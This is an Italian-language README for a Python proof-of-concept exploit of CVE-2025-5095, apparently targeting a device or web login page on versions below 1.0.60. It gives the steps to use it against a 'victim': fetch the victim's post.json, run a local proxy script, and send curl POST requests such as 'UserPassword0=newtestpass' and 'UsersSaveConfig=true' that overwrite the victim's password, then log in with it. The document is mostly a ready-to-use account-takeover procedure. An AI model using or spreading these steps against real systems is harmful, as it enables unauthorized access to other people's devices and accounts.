
POC Python per CVE-2025-5095
Come Usare:
Apri Login.htm e modifica i punti in cui IP:PORT è l'indirizzo della vittima
Modifica la parte var LoginVersion = "Check On The Victim Site"; con la versione della pagina della vittima, in questo modo puoi visitare la pagina della vittima e visualizzare il sorgente ATTENZIONE: QUESTA CVE FUNZIONA SOLO SU VERSIONI ANTERIORI ALLA 1.0.60
Scarica il file post.json dal sito della vittima (http://victimip:port/post.json) Spostalo nella cartella dello script e avrai 3 file
Ora esegui il file python e accedi a 127.0.0.1:8080/login.htm (Se la porta 8080 è già in uso, puoi cambiarla aprendo lo script in un editor di testo e modificando l'ultima parte)
Ignora l'avviso quando apri la pagina di login
Apri un terminale e usa questi comandi curl, se stampa "success" ha funzionato.
curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"
curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"
Per verificare se la pagina è cambiata, invia questo comando:
curl http://localhost:8080/check_password
Ora visita il sito della vittima (non quello su localhost) e inserisci la nuova password, in questo esempio la password è "newtestpass"